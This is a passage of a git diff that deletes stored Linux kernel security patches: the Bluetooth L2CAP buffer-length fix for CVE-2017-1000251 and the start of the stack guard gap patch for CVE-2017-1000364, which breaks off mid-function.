L2CAP_CONF_EXT_WINDOW, -- 2, pi->tx_win); -+ 2, pi->tx_win, endptr - ptr); - break; - - default: -@@ -4262,7 +4271,7 @@ - u8 buf[128]; - l2cap_pi(sk)->conf_state |= L2CAP_CONF_REQ_SENT; - l2cap_send_cmd(conn, l2cap_get_ident(conn), L2CAP_CONF_REQ, -- l2cap_build_conf_req(sk, buf), buf); -+ l2cap_build_conf_req(sk, buf, sizeof(buf)), buf); - l2cap_pi(sk)->num_conf_req++; - } - -@@ -4320,7 
+4329,7 @@ - l2cap_pi(sk)->conf_state |= L2CAP_CONF_REQ_SENT; - - l2cap_send_cmd(conn, l2cap_get_ident(conn), L2CAP_CONF_REQ, -- l2cap_build_conf_req(sk, req), req); -+ l2cap_build_conf_req(sk, req, sizeof(req)), req); - l2cap_pi(sk)->num_conf_req++; - break; - -@@ -4427,9 +4436,9 @@ - - /* Complete config. */ - if (!amp_move_reconf) -- len = l2cap_parse_conf_req(sk, rspbuf); -+ len = l2cap_parse_conf_req(sk, rspbuf, sizeof(rspbuf)); - else -- len = l2cap_parse_amp_move_reconf_req(sk, rspbuf); -+ len = l2cap_parse_amp_move_reconf_req(sk, rspbuf, sizeof(rspbuf)); - - if (len < 0) { - l2cap_send_disconn_req(conn, sk, ECONNRESET); -@@ -4478,7 +4487,7 @@ - u8 buf[64]; - l2cap_pi(sk)->conf_state |= L2CAP_CONF_REQ_SENT; - l2cap_send_cmd(conn, l2cap_get_ident(conn), L2CAP_CONF_REQ, -- l2cap_build_conf_req(sk, buf), buf); -+ l2cap_build_conf_req(sk, buf, sizeof(buf)), buf); - l2cap_pi(sk)->num_conf_req++; - } - -@@ -4575,7 +4584,7 @@ - /* throw out any old stored conf requests */ - result = L2CAP_CONF_SUCCESS; - len = l2cap_parse_conf_rsp(sk, rsp->data, -- len, req, &result); -+ len, req, sizeof(req), &result); - if (len < 0) { - l2cap_send_disconn_req(conn, sk, ECONNRESET); - goto done; -@@ -5397,7 +5406,7 @@ - l2cap_send_cmd(pi->conn, - l2cap_get_ident(pi->conn), - L2CAP_CONF_REQ, -- l2cap_build_conf_req(sk, buf), buf); -+ l2cap_build_conf_req(sk, buf, sizeof(buf)), buf); - l2cap_pi(sk)->num_conf_req++; - } - } else { -@@ -6959,7 +6968,7 @@ - pi = l2cap_pi(sk); - - l2cap_send_cmd(pi->conn, l2cap_get_ident(pi->conn), L2CAP_CONF_REQ, -- l2cap_build_amp_reconf_req(sk, buf), buf); -+ l2cap_build_amp_reconf_req(sk, buf, sizeof(buf)), buf); - return err; - } - -@@ -7694,7 +7703,7 @@ - l2cap_pi(sk)->conf_state |= L2CAP_CONF_REQ_SENT; - l2cap_send_cmd(conn, l2cap_get_ident(conn), - L2CAP_CONF_REQ, -- l2cap_build_conf_req(sk, buf), -+ l2cap_build_conf_req(sk, buf, sizeof(buf)), - buf); - l2cap_pi(sk)->num_conf_req++; - } -diff --git a/net/bluetooth/l2cap_sock.c 
b/net/bluetooth/l2cap_sock.c -index 6da494f..baf1af7 100644 ---- a/net/bluetooth/l2cap_sock.c -+++ b/net/bluetooth/l2cap_sock.c -@@ -1036,7 +1036,7 @@ - - l2cap_pi(sk)->conf_state |= L2CAP_CONF_REQ_SENT; - l2cap_send_cmd(conn, l2cap_get_ident(conn), L2CAP_CONF_REQ, -- l2cap_build_conf_req(sk, buf), buf); -+ l2cap_build_conf_req(sk, buf, sizeof(buf)), buf); - l2cap_pi(sk)->num_conf_req++; - - release_sock(sk); diff --git a/Patches/Linux_CVEs/CVE-2017-1000251/3.4/0002.patch.base64 b/Patches/Linux_CVEs/CVE-2017-1000251/3.4/0002.patch.base64 deleted file mode 100644 index 8fbe0c27..00000000 --- a/Patches/Linux_CVEs/CVE-2017-1000251/3.4/0002.patch.base64 +++ /dev/null @@ -1 +0,0 @@ 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 \ No newline at end of file diff --git a/Patches/Linux_CVEs/CVE-2017-1000251/ANY/0003.patch b/Patches/Linux_CVEs/CVE-2017-1000251/ANY/0003.patch deleted file mode 100644 index c6bfdf71..00000000 --- a/Patches/Linux_CVEs/CVE-2017-1000251/ANY/0003.patch +++ /dev/null 
@@ -1,357 +0,0 @@ -From e860d2c904d1a9f38a24eb44c9f34b8f915a6ea3 Mon Sep 17 00:00:00 2001 -From: Ben Seri -Date: Sat, 9 Sep 2017 23:15:59 +0200 -Subject: Bluetooth: Properly check L2CAP config option output buffer length - -Validate the output buffer length for L2CAP config requests and responses -to avoid overflowing the stack buffer used for building the option blocks. - -Cc: stable@vger.kernel.org -Signed-off-by: Ben Seri -Signed-off-by: Marcel Holtmann -Signed-off-by: Linus Torvalds ---- - net/bluetooth/l2cap_core.c | 80 +++++++++++++++++++++++++--------------------- - 1 file changed, 43 insertions(+), 37 deletions(-) - -diff --git a/net/bluetooth/l2cap_core.c b/net/bluetooth/l2cap_core.c -index 303c779..43ba91c 100644 ---- a/net/bluetooth/l2cap_core.c -+++ b/net/bluetooth/l2cap_core.c -@@ -58,7 +58,7 @@ static struct sk_buff *l2cap_build_cmd(struct l2cap_conn *conn, - u8 code, u8 ident, u16 dlen, void *data); - static void l2cap_send_cmd(struct l2cap_conn *conn, u8 ident, u8 code, u16 len, - void *data); --static int l2cap_build_conf_req(struct l2cap_chan *chan, void *data); -+static int l2cap_build_conf_req(struct l2cap_chan *chan, void *data, size_t data_size); - static void l2cap_send_disconn_req(struct l2cap_chan *chan, int err); - - static void l2cap_tx(struct l2cap_chan *chan, struct l2cap_ctrl *control, -@@ -1473,7 +1473,7 @@ static void l2cap_conn_start(struct l2cap_conn *conn) - - set_bit(CONF_REQ_SENT, &chan->conf_state); - l2cap_send_cmd(conn, l2cap_get_ident(conn), L2CAP_CONF_REQ, -- l2cap_build_conf_req(chan, buf), buf); -+ l2cap_build_conf_req(chan, buf, sizeof(buf)), buf); - chan->num_conf_req++; - } - -@@ -2987,12 +2987,15 @@ static inline int l2cap_get_conf_opt(void **ptr, int *type, int *olen, - return len; - } - --static void l2cap_add_conf_opt(void **ptr, u8 type, u8 len, unsigned long val) -+static void l2cap_add_conf_opt(void **ptr, u8 type, u8 len, unsigned long val, size_t size) - { - struct l2cap_conf_opt *opt = *ptr; - - BT_DBG("type 
0x%2.2x len %u val 0x%lx", type, len, val); - -+ if (size < L2CAP_CONF_OPT_SIZE + len) -+ return; -+ - opt->type = type; - opt->len = len; - -@@ -3017,7 +3020,7 @@ static void l2cap_add_conf_opt(void **ptr, u8 type, u8 len, unsigned long val) - *ptr += L2CAP_CONF_OPT_SIZE + len; - } - --static void l2cap_add_opt_efs(void **ptr, struct l2cap_chan *chan) -+static void l2cap_add_opt_efs(void **ptr, struct l2cap_chan *chan, size_t size) - { - struct l2cap_conf_efs efs; - -@@ -3045,7 +3048,7 @@ static void l2cap_add_opt_efs(void **ptr, struct l2cap_chan *chan) - } - - l2cap_add_conf_opt(ptr, L2CAP_CONF_EFS, sizeof(efs), -- (unsigned long) &efs); -+ (unsigned long) &efs, size); - } - - static void l2cap_ack_timeout(struct work_struct *work) -@@ -3191,11 +3194,12 @@ static inline void l2cap_txwin_setup(struct l2cap_chan *chan) - chan->ack_win = chan->tx_win; - } - --static int l2cap_build_conf_req(struct l2cap_chan *chan, void *data) -+static int l2cap_build_conf_req(struct l2cap_chan *chan, void *data, size_t data_size) - { - struct l2cap_conf_req *req = data; - struct l2cap_conf_rfc rfc = { .mode = chan->mode }; - void *ptr = req->data; -+ void *endptr = data + data_size; - u16 size; - - BT_DBG("chan %p", chan); -@@ -3220,7 +3224,7 @@ static int l2cap_build_conf_req(struct l2cap_chan *chan, void *data) - - done: - if (chan->imtu != L2CAP_DEFAULT_MTU) -- l2cap_add_conf_opt(&ptr, L2CAP_CONF_MTU, 2, chan->imtu); -+ l2cap_add_conf_opt(&ptr, L2CAP_CONF_MTU, 2, chan->imtu, endptr - ptr); - - switch (chan->mode) { - case L2CAP_MODE_BASIC: -@@ -3239,7 +3243,7 @@ done: - rfc.max_pdu_size = 0; - - l2cap_add_conf_opt(&ptr, L2CAP_CONF_RFC, sizeof(rfc), -- (unsigned long) &rfc); -+ (unsigned long) &rfc, endptr - ptr); - break; - - case L2CAP_MODE_ERTM: -@@ -3259,21 +3263,21 @@ done: - L2CAP_DEFAULT_TX_WINDOW); - - l2cap_add_conf_opt(&ptr, L2CAP_CONF_RFC, sizeof(rfc), -- (unsigned long) &rfc); -+ (unsigned long) &rfc, endptr - ptr); - - if (test_bit(FLAG_EFS_ENABLE, &chan->flags)) -- 
l2cap_add_opt_efs(&ptr, chan); -+ l2cap_add_opt_efs(&ptr, chan, endptr - ptr); - - if (test_bit(FLAG_EXT_CTRL, &chan->flags)) - l2cap_add_conf_opt(&ptr, L2CAP_CONF_EWS, 2, -- chan->tx_win); -+ chan->tx_win, endptr - ptr); - - if (chan->conn->feat_mask & L2CAP_FEAT_FCS) - if (chan->fcs == L2CAP_FCS_NONE || - test_bit(CONF_RECV_NO_FCS, &chan->conf_state)) { - chan->fcs = L2CAP_FCS_NONE; - l2cap_add_conf_opt(&ptr, L2CAP_CONF_FCS, 1, -- chan->fcs); -+ chan->fcs, endptr - ptr); - } - break; - -@@ -3291,17 +3295,17 @@ done: - rfc.max_pdu_size = cpu_to_le16(size); - - l2cap_add_conf_opt(&ptr, L2CAP_CONF_RFC, sizeof(rfc), -- (unsigned long) &rfc); -+ (unsigned long) &rfc, endptr - ptr); - - if (test_bit(FLAG_EFS_ENABLE, &chan->flags)) -- l2cap_add_opt_efs(&ptr, chan); -+ l2cap_add_opt_efs(&ptr, chan, endptr - ptr); - - if (chan->conn->feat_mask & L2CAP_FEAT_FCS) - if (chan->fcs == L2CAP_FCS_NONE || - test_bit(CONF_RECV_NO_FCS, &chan->conf_state)) { - chan->fcs = L2CAP_FCS_NONE; - l2cap_add_conf_opt(&ptr, L2CAP_CONF_FCS, 1, -- chan->fcs); -+ chan->fcs, endptr - ptr); - } - break; - } -@@ -3312,10 +3316,11 @@ done: - return ptr - data; - } - --static int l2cap_parse_conf_req(struct l2cap_chan *chan, void *data) -+static int l2cap_parse_conf_req(struct l2cap_chan *chan, void *data, size_t data_size) - { - struct l2cap_conf_rsp *rsp = data; - void *ptr = rsp->data; -+ void *endptr = data + data_size; - void *req = chan->conf_req; - int len = chan->conf_len; - int type, hint, olen; -@@ -3417,7 +3422,7 @@ done: - return -ECONNREFUSED; - - l2cap_add_conf_opt(&ptr, L2CAP_CONF_RFC, sizeof(rfc), -- (unsigned long) &rfc); -+ (unsigned long) &rfc, endptr - ptr); - } - - if (result == L2CAP_CONF_SUCCESS) { -@@ -3430,7 +3435,7 @@ done: - chan->omtu = mtu; - set_bit(CONF_MTU_DONE, &chan->conf_state); - } -- l2cap_add_conf_opt(&ptr, L2CAP_CONF_MTU, 2, chan->omtu); -+ l2cap_add_conf_opt(&ptr, L2CAP_CONF_MTU, 2, chan->omtu, endptr - ptr); - - if (remote_efs) { - if (chan->local_stype != 
L2CAP_SERV_NOTRAFIC && -@@ -3444,7 +3449,7 @@ done: - - l2cap_add_conf_opt(&ptr, L2CAP_CONF_EFS, - sizeof(efs), -- (unsigned long) &efs); -+ (unsigned long) &efs, endptr - ptr); - } else { - /* Send PENDING Conf Rsp */ - result = L2CAP_CONF_PENDING; -@@ -3477,7 +3482,7 @@ done: - set_bit(CONF_MODE_DONE, &chan->conf_state); - - l2cap_add_conf_opt(&ptr, L2CAP_CONF_RFC, -- sizeof(rfc), (unsigned long) &rfc); -+ sizeof(rfc), (unsigned long) &rfc, endptr - ptr); - - if (test_bit(FLAG_EFS_ENABLE, &chan->flags)) { - chan->remote_id = efs.id; -@@ -3491,7 +3496,7 @@ done: - le32_to_cpu(efs.sdu_itime); - l2cap_add_conf_opt(&ptr, L2CAP_CONF_EFS, - sizeof(efs), -- (unsigned long) &efs); -+ (unsigned long) &efs, endptr - ptr); - } - break; - -@@ -3505,7 +3510,7 @@ done: - set_bit(CONF_MODE_DONE, &chan->conf_state); - - l2cap_add_conf_opt(&ptr, L2CAP_CONF_RFC, sizeof(rfc), -- (unsigned long) &rfc); -+ (unsigned long) &rfc, endptr - ptr); - - break; - -@@ -3527,10 +3532,11 @@ done: - } - - static int l2cap_parse_conf_rsp(struct l2cap_chan *chan, void *rsp, int len, -- void *data, u16 *result) -+ void *data, size_t size, u16 *result) - { - struct l2cap_conf_req *req = data; - void *ptr = req->data; -+ void *endptr = data + size; - int type, olen; - unsigned long val; - struct l2cap_conf_rfc rfc = { .mode = L2CAP_MODE_BASIC }; -@@ -3548,13 +3554,13 @@ static int l2cap_parse_conf_rsp(struct l2cap_chan *chan, void *rsp, int len, - chan->imtu = L2CAP_DEFAULT_MIN_MTU; - } else - chan->imtu = val; -- l2cap_add_conf_opt(&ptr, L2CAP_CONF_MTU, 2, chan->imtu); -+ l2cap_add_conf_opt(&ptr, L2CAP_CONF_MTU, 2, chan->imtu, endptr - ptr); - break; - - case L2CAP_CONF_FLUSH_TO: - chan->flush_to = val; - l2cap_add_conf_opt(&ptr, L2CAP_CONF_FLUSH_TO, -- 2, chan->flush_to); -+ 2, chan->flush_to, endptr - ptr); - break; - - case L2CAP_CONF_RFC: -@@ -3568,13 +3574,13 @@ static int l2cap_parse_conf_rsp(struct l2cap_chan *chan, void *rsp, int len, - chan->fcs = 0; - - l2cap_add_conf_opt(&ptr, 
L2CAP_CONF_RFC, -- sizeof(rfc), (unsigned long) &rfc); -+ sizeof(rfc), (unsigned long) &rfc, endptr - ptr); - break; - - case L2CAP_CONF_EWS: - chan->ack_win = min_t(u16, val, chan->ack_win); - l2cap_add_conf_opt(&ptr, L2CAP_CONF_EWS, 2, -- chan->tx_win); -+ chan->tx_win, endptr - ptr); - break; - - case L2CAP_CONF_EFS: -@@ -3587,7 +3593,7 @@ static int l2cap_parse_conf_rsp(struct l2cap_chan *chan, void *rsp, int len, - return -ECONNREFUSED; - - l2cap_add_conf_opt(&ptr, L2CAP_CONF_EFS, sizeof(efs), -- (unsigned long) &efs); -+ (unsigned long) &efs, endptr - ptr); - break; - - case L2CAP_CONF_FCS: -@@ -3692,7 +3698,7 @@ void __l2cap_connect_rsp_defer(struct l2cap_chan *chan) - return; - - l2cap_send_cmd(conn, l2cap_get_ident(conn), L2CAP_CONF_REQ, -- l2cap_build_conf_req(chan, buf), buf); -+ l2cap_build_conf_req(chan, buf, sizeof(buf)), buf); - chan->num_conf_req++; - } - -@@ -3900,7 +3906,7 @@ sendresp: - u8 buf[128]; - set_bit(CONF_REQ_SENT, &chan->conf_state); - l2cap_send_cmd(conn, l2cap_get_ident(conn), L2CAP_CONF_REQ, -- l2cap_build_conf_req(chan, buf), buf); -+ l2cap_build_conf_req(chan, buf, sizeof(buf)), buf); - chan->num_conf_req++; - } - -@@ -3978,7 +3984,7 @@ static int l2cap_connect_create_rsp(struct l2cap_conn *conn, - break; - - l2cap_send_cmd(conn, l2cap_get_ident(conn), L2CAP_CONF_REQ, -- l2cap_build_conf_req(chan, req), req); -+ l2cap_build_conf_req(chan, req, sizeof(req)), req); - chan->num_conf_req++; - break; - -@@ -4090,7 +4096,7 @@ static inline int l2cap_config_req(struct l2cap_conn *conn, - } - - /* Complete config. 
*/ -- len = l2cap_parse_conf_req(chan, rsp); -+ len = l2cap_parse_conf_req(chan, rsp, sizeof(rsp)); - if (len < 0) { - l2cap_send_disconn_req(chan, ECONNRESET); - goto unlock; -@@ -4124,7 +4130,7 @@ static inline int l2cap_config_req(struct l2cap_conn *conn, - if (!test_and_set_bit(CONF_REQ_SENT, &chan->conf_state)) { - u8 buf[64]; - l2cap_send_cmd(conn, l2cap_get_ident(conn), L2CAP_CONF_REQ, -- l2cap_build_conf_req(chan, buf), buf); -+ l2cap_build_conf_req(chan, buf, sizeof(buf)), buf); - chan->num_conf_req++; - } - -@@ -4184,7 +4190,7 @@ static inline int l2cap_config_rsp(struct l2cap_conn *conn, - char buf[64]; - - len = l2cap_parse_conf_rsp(chan, rsp->data, len, -- buf, &result); -+ buf, sizeof(buf), &result); - if (len < 0) { - l2cap_send_disconn_req(chan, ECONNRESET); - goto done; -@@ -4214,7 +4220,7 @@ static inline int l2cap_config_rsp(struct l2cap_conn *conn, - /* throw out any old stored conf requests */ - result = L2CAP_CONF_SUCCESS; - len = l2cap_parse_conf_rsp(chan, rsp->data, len, -- req, &result); -+ req, sizeof(req), &result); - if (len < 0) { - l2cap_send_disconn_req(chan, ECONNRESET); - goto done; -@@ -4791,7 +4797,7 @@ static void l2cap_do_create(struct l2cap_chan *chan, int result, - set_bit(CONF_REQ_SENT, &chan->conf_state); - l2cap_send_cmd(chan->conn, l2cap_get_ident(chan->conn), - L2CAP_CONF_REQ, -- l2cap_build_conf_req(chan, buf), buf); -+ l2cap_build_conf_req(chan, buf, sizeof(buf)), buf); - chan->num_conf_req++; - } - } -@@ -7465,7 +7471,7 @@ static void l2cap_security_cfm(struct hci_conn *hcon, u8 status, u8 encrypt) - set_bit(CONF_REQ_SENT, &chan->conf_state); - l2cap_send_cmd(conn, l2cap_get_ident(conn), - L2CAP_CONF_REQ, -- l2cap_build_conf_req(chan, buf), -+ l2cap_build_conf_req(chan, buf, sizeof(buf)), - buf); - chan->num_conf_req++; - } --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-1000364/3.10/0005.patch b/Patches/Linux_CVEs/CVE-2017-1000364/3.10/0005.patch deleted file mode 100644 index 164af9bd..00000000 
--- a/Patches/Linux_CVEs/CVE-2017-1000364/3.10/0005.patch
+++ /dev/null
@@ -1,860 +0,0 @@ -From 9954e33ef0e1f5e1136c1bdde1e18f40e9c8af69 Mon Sep 17 00:00:00 2001 -From: Hugh Dickins -Date: Mon, 19 Jun 2017 04:03:24 -0700 -Subject: [PATCH] mm: larger stack guard gap, between vmas - -commit 1be7107fbe18eed3e319a6c3e83c78254b693acb upstream. - -Stack guard page is a useful feature to reduce a risk of stack smashing -into a different mapping. We have been using a single page gap which -is sufficient to prevent having stack adjacent to a different mapping. -But this seems to be insufficient in the light of the stack usage in -userspace. E.g. glibc uses as large as 64kB alloca() in many commonly -used functions. Others use constructs liks gid_t buffer[NGROUPS_MAX] -which is 256kB or stack strings with MAX_ARG_STRLEN. - -This will become especially dangerous for suid binaries and the default -no limit for the stack size limit because those applications can be -tricked to consume a large portion of the stack and a single glibc call -could jump over the guard page. These attacks are not theoretical, -unfortunatelly. - -Make those attacks less probable by increasing the stack guard gap -to 1MB (on systems with 4k pages; but make it depend on the page size -because systems with larger base pages might cap stack allocations in -the PAGE_SIZE units) which should cover larger alloca() and VLA stack -allocations. It is obviously not a full fix because the problem is -somehow inherent, but it should reduce attack space a lot. - -One could argue that the gap size should be configurable from userspace, -but that can be done later when somebody finds that the new 1MB is wrong -for some special case applications. For now, add a kernel command line -option (stack_guard_gap) to specify the stack gap size (in page units). 
- -Implementation wise, first delete all the old code for stack guard page: -because although we could get away with accounting one extra page in a -stack vma, accounting a larger gap can break userspace - case in point, -a program run with "ulimit -S -v 20000" failed when the 1MB gap was -counted for RLIMIT_AS; similar problems could come with RLIMIT_MLOCK -and strict non-overcommit mode. - -Instead of keeping gap inside the stack vma, maintain the stack guard -gap as a gap between vmas: using vm_start_gap() in place of vm_start -(or vm_end_gap() in place of vm_end if VM_GROWSUP) in just those few -places which need to respect the gap - mainly arch_get_unmapped_area(), -and and the vma tree's subtree_gap support for that. - -Change-Id: I899511079c5057ee5299ef1aff5ab8f0c77c740d -Original-patch-by: Oleg Nesterov -Original-patch-by: Michal Hocko -Signed-off-by: Hugh Dickins -[wt: backport to 4.11: adjust context] -[wt: backport to 4.9: adjust context ; kernel doc was not in admin-guide] -[wt: backport to 4.4: adjust context ; drop ppc hugetlb_radix changes] -[wt: backport to 3.18: adjust context ; no FOLL_POPULATE ; - s390 uses generic arch_get_unmapped_area()] -[wt: backport to 3.16: adjust context] -[wt: backport to 3.10: adjust context ; code logic in PARISC's - arch_get_unmapped_area() wasn't found ; code inserted into - expand_upwards() and expand_downwards() runs under anon_vma lock; - changes for gup.c:faultin_page go to memory.c:__get_user_pages(); - included Hugh Dickins' fixes] -Signed-off-by: Willy Tarreau ---- - -diff --git a/Documentation/kernel-parameters.txt b/Documentation/kernel-parameters.txt -index 2fcbee1..a91d035 100644 ---- a/Documentation/kernel-parameters.txt -+++ b/Documentation/kernel-parameters.txt -@@ -2918,6 +2918,13 @@ - spia_pedr= - spia_peddr= - -+ stack_guard_gap= [MM] -+ override the default stack gap protection. The value -+ is in page units and it defines how many pages prior -+ to (for stacks growing down) resp. 
after (for stacks -+ growing up) the main stack are reserved for no other -+ mapping. Default value is 256 pages. -+ - stacktrace [FTRACE] - Enabled the stack tracer on boot up. - -diff --git a/arch/arc/mm/mmap.c b/arch/arc/mm/mmap.c -index 2e06d56..cf4ae69 100644 ---- a/arch/arc/mm/mmap.c -+++ b/arch/arc/mm/mmap.c -@@ -64,7 +64,7 @@ - - vma = find_vma(mm, addr); - if (TASK_SIZE - len >= addr && -- (!vma || addr + len <= vma->vm_start)) -+ (!vma || addr + len <= vm_start_gap(vma))) - return addr; - } - -diff --git a/arch/arm/mm/mmap.c b/arch/arm/mm/mmap.c -index 2d689d1..dae47df 100644 ---- a/arch/arm/mm/mmap.c -+++ b/arch/arm/mm/mmap.c -@@ -89,7 +89,7 @@ - - vma = find_vma(mm, addr); - if (TASK_SIZE - len >= addr && -- (!vma || addr + len <= vma->vm_start)) -+ (!vma || addr + len <= vm_start_gap(vma))) - return addr; - } - -@@ -140,7 +140,7 @@ - addr = PAGE_ALIGN(addr); - vma = find_vma(mm, addr); - if (TASK_SIZE - len >= addr && -- (!vma || addr + len <= vma->vm_start)) -+ (!vma || addr + len <= vm_start_gap(vma))) - return addr; - } - -diff --git a/arch/frv/mm/elf-fdpic.c b/arch/frv/mm/elf-fdpic.c -index 836f147..efa59f1 100644 ---- a/arch/frv/mm/elf-fdpic.c -+++ b/arch/frv/mm/elf-fdpic.c -@@ -74,7 +74,7 @@ - addr = PAGE_ALIGN(addr); - vma = find_vma(current->mm, addr); - if (TASK_SIZE - len >= addr && -- (!vma || addr + len <= vma->vm_start)) -+ (!vma || addr + len <= vm_start_gap(vma))) - goto success; - } - -diff --git a/arch/mips/mm/mmap.c b/arch/mips/mm/mmap.c -index 5ab9e96..7f46346 100644 ---- a/arch/mips/mm/mmap.c -+++ b/arch/mips/mm/mmap.c -@@ -92,7 +92,7 @@ - - vma = find_vma(mm, addr); - if (TASK_SIZE - len >= addr && -- (!vma || addr + len <= vma->vm_start)) -+ (!vma || addr + len <= vm_start_gap(vma))) - return addr; - } - -diff --git a/arch/powerpc/mm/slice.c b/arch/powerpc/mm/slice.c -index 7ce9cf3..887365a 100644 ---- a/arch/powerpc/mm/slice.c -+++ b/arch/powerpc/mm/slice.c -@@ -103,7 +103,7 @@ - if ((mm->task_size - len) < addr) - return 0; - 
vma = find_vma(mm, addr); -- return (!vma || (addr + len) <= vma->vm_start); -+ return (!vma || (addr + len) <= vm_start_gap(vma)); - } - - static int slice_low_has_vma(struct mm_struct *mm, unsigned long slice) -diff --git a/arch/sh/mm/mmap.c b/arch/sh/mm/mmap.c -index 6777177..7df7d59 100644 ---- a/arch/sh/mm/mmap.c -+++ b/arch/sh/mm/mmap.c -@@ -63,7 +63,7 @@ - - vma = find_vma(mm, addr); - if (TASK_SIZE - len >= addr && -- (!vma || addr + len <= vma->vm_start)) -+ (!vma || addr + len <= vm_start_gap(vma))) - return addr; - } - -@@ -113,7 +113,7 @@ - - vma = find_vma(mm, addr); - if (TASK_SIZE - len >= addr && -- (!vma || addr + len <= vma->vm_start)) -+ (!vma || addr + len <= vm_start_gap(vma))) - return addr; - } - -diff --git a/arch/sparc/kernel/sys_sparc_64.c b/arch/sparc/kernel/sys_sparc_64.c -index 21bca21..ea80c0b 100644 ---- a/arch/sparc/kernel/sys_sparc_64.c -+++ b/arch/sparc/kernel/sys_sparc_64.c -@@ -119,7 +119,7 @@ - - vma = find_vma(mm, addr); - if (task_size - len >= addr && -- (!vma || addr + len <= vma->vm_start)) -+ (!vma || addr + len <= vm_start_gap(vma))) - return addr; - } - -@@ -182,7 +182,7 @@ - - vma = find_vma(mm, addr); - if (task_size - len >= addr && -- (!vma || addr + len <= vma->vm_start)) -+ (!vma || addr + len <= vm_start_gap(vma))) - return addr; - } - -diff --git a/arch/sparc/mm/hugetlbpage.c b/arch/sparc/mm/hugetlbpage.c -index 9639964..64ee888 100644 ---- a/arch/sparc/mm/hugetlbpage.c -+++ b/arch/sparc/mm/hugetlbpage.c -@@ -118,7 +118,7 @@ - addr = ALIGN(addr, HPAGE_SIZE); - vma = find_vma(mm, addr); - if (task_size - len >= addr && -- (!vma || addr + len <= vma->vm_start)) -+ (!vma || addr + len <= vm_start_gap(vma))) - return addr; - } - if (mm->get_unmapped_area == arch_get_unmapped_area) -diff --git a/arch/tile/mm/hugetlbpage.c b/arch/tile/mm/hugetlbpage.c -index 0ac3599..d435215 100644 ---- a/arch/tile/mm/hugetlbpage.c -+++ b/arch/tile/mm/hugetlbpage.c -@@ -302,7 +302,7 @@ - addr = ALIGN(addr, huge_page_size(h)); - vma = 
find_vma(mm, addr); - if (TASK_SIZE - len >= addr && -- (!vma || addr + len <= vma->vm_start)) -+ (!vma || addr + len <= vm_start_gap(vma))) - return addr; - } - if (current->mm->get_unmapped_area == arch_get_unmapped_area) -diff --git a/arch/x86/kernel/sys_x86_64.c b/arch/x86/kernel/sys_x86_64.c -index 30277e2..d050393 100644 ---- a/arch/x86/kernel/sys_x86_64.c -+++ b/arch/x86/kernel/sys_x86_64.c -@@ -127,7 +127,7 @@ - addr = PAGE_ALIGN(addr); - vma = find_vma(mm, addr); - if (end - len >= addr && -- (!vma || addr + len <= vma->vm_start)) -+ (!vma || addr + len <= vm_start_gap(vma))) - return addr; - } - -@@ -166,7 +166,7 @@ - addr = PAGE_ALIGN(addr); - vma = find_vma(mm, addr); - if (TASK_SIZE - len >= addr && -- (!vma || addr + len <= vma->vm_start)) -+ (!vma || addr + len <= vm_start_gap(vma))) - return addr; - } - -diff --git a/arch/x86/mm/hugetlbpage.c b/arch/x86/mm/hugetlbpage.c -index 4348803..1bb5570 100644 ---- a/arch/x86/mm/hugetlbpage.c -+++ b/arch/x86/mm/hugetlbpage.c -@@ -349,7 +349,7 @@ - addr = ALIGN(addr, huge_page_size(h)); - vma = find_vma(mm, addr); - if (TASK_SIZE - len >= addr && -- (!vma || addr + len <= vma->vm_start)) -+ (!vma || addr + len <= vm_start_gap(vma))) - return addr; - } - if (mm->get_unmapped_area == arch_get_unmapped_area) -diff --git a/arch/xtensa/kernel/syscall.c b/arch/xtensa/kernel/syscall.c -index 5d3f7a1..1ff0b92 100644 ---- a/arch/xtensa/kernel/syscall.c -+++ b/arch/xtensa/kernel/syscall.c -@@ -86,7 +86,7 @@ - /* At this point: (!vmm || addr < vmm->vm_end). 
*/ - if (TASK_SIZE - len < addr) - return -ENOMEM; -- if (!vmm || addr + len <= vmm->vm_start) -+ if (!vmm || addr + len <= vm_start_gap(vmm)) - return addr; - addr = vmm->vm_end; - if (flags & MAP_SHARED) -diff --git a/fs/hugetlbfs/inode.c b/fs/hugetlbfs/inode.c -index 4e5f332..db7d89c 100644 ---- a/fs/hugetlbfs/inode.c -+++ b/fs/hugetlbfs/inode.c -@@ -169,7 +169,7 @@ - addr = ALIGN(addr, huge_page_size(h)); - vma = find_vma(mm, addr); - if (TASK_SIZE - len >= addr && -- (!vma || addr + len <= vma->vm_start)) -+ (!vma || addr + len <= vm_start_gap(vma))) - return addr; - } - -diff --git a/fs/proc/task_mmu.c b/fs/proc/task_mmu.c -index f7cf04b..ced4a0b 100644 ---- a/fs/proc/task_mmu.c -+++ b/fs/proc/task_mmu.c -@@ -322,11 +322,7 @@ - - /* We don't show the stack guard page in /proc/maps */ - start = vma->vm_start; -- if (stack_guard_page_start(vma, start)) -- start += PAGE_SIZE; - end = vma->vm_end; -- if (stack_guard_page_end(vma, end)) -- end -= PAGE_SIZE; - - seq_setwidth(m, 25 + sizeof(void *) * 6 - 1); - seq_printf(m, "%08lx-%08lx %c%c%c%c %08llx %02x:%02x %lu ", -diff --git a/include/linux/mm.h b/include/linux/mm.h -index 6713bcd..1ed4b4b 100644 ---- a/include/linux/mm.h -+++ b/include/linux/mm.h -@@ -1098,34 +1098,6 @@ - int clear_page_dirty_for_io(struct page *page); - int get_cmdline(struct task_struct *task, char *buffer, int buflen); - --/* Is the vma a continuation of the stack vma above it? */ --static inline int vma_growsdown(struct vm_area_struct *vma, unsigned long addr) --{ -- return vma && (vma->vm_end == addr) && (vma->vm_flags & VM_GROWSDOWN); --} -- --static inline int stack_guard_page_start(struct vm_area_struct *vma, -- unsigned long addr) --{ -- return (vma->vm_flags & VM_GROWSDOWN) && -- (vma->vm_start == addr) && -- !vma_growsdown(vma->vm_prev, addr); --} -- --/* Is the vma a continuation of the stack vma below it? 
*/ --static inline int vma_growsup(struct vm_area_struct *vma, unsigned long addr) --{ -- return vma && (vma->vm_start == addr) && (vma->vm_flags & VM_GROWSUP); --} -- --static inline int stack_guard_page_end(struct vm_area_struct *vma, -- unsigned long addr) --{ -- return (vma->vm_flags & VM_GROWSUP) && -- (vma->vm_end == addr) && -- !vma_growsup(vma->vm_next, addr); --} -- - extern pid_t - vm_is_stack(struct task_struct *task, struct vm_area_struct *vma, int in_group); - -@@ -1677,6 +1649,7 @@ - struct address_space *mapping, - struct file *filp); - -+extern unsigned long stack_guard_gap; - /* Generic expand stack which grows the stack according to GROWS{UP,DOWN} */ - extern int expand_stack(struct vm_area_struct *vma, unsigned long address); - -@@ -1705,6 +1678,30 @@ - return vma; - } - -+static inline unsigned long vm_start_gap(struct vm_area_struct *vma) -+{ 